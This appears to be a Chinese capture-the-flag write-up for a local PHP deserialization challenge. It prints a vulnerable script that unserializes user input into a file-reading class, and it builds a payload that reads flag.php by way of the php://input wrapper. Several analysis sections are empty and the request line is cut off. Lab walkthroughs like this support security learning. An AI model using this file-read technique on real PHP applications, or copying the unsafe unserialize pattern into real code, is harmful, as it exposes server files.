我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!
PHP反序列化漏洞
level6-[本地复现]-[file_get_conents]-[php://input伪协议]
1.题目描述
<?php
error_reporting(0);
include("flag.php");
class Flag{
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("good");
}
}
}
$txt = $_GET["txt"];
$password = $_GET["password"];
if(!isset($txt)){
show_source(__FILE__);
exit();
}
if(file_get_contents($txt,'r')==="welcome to the aegis"){
echo "hello friend!<br>";
$password = unserialize($password);
echo $password;
}else{
echo "something wrong! try it again";
}
2.代码审计
通读代码:
<?php
error_reporting(0);
include("flag.php");
class Flag{
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("good");
}
}
}
$txt = $_GET["txt"];
$password = $_GET["password"];
if(!isset($txt)){
show_source(__FILE__);
exit();
}
if(file_get_contents($txt,'r')==="welcome to the aegis"){
echo "hello friend!<br>";
$password = unserialize($password);
echo $password;
}else{
echo "something wrong! try it again";
}
按序,分析所得:
反序列化四要素,分析所得:
3.解题过程
第一步:分析流程
第二步:根据以上步骤构造payload
<?php
class Flag{
public $file='flag.php';
}
$chen = new Flag();
echo serialize($chen);
第三步:传入payload,读取flag值
GET内容:
?txt=php:
POST内容:
welcome to the aegis
附:修改BurpsuiteHTTP包的字体大小的方法
4.总结
|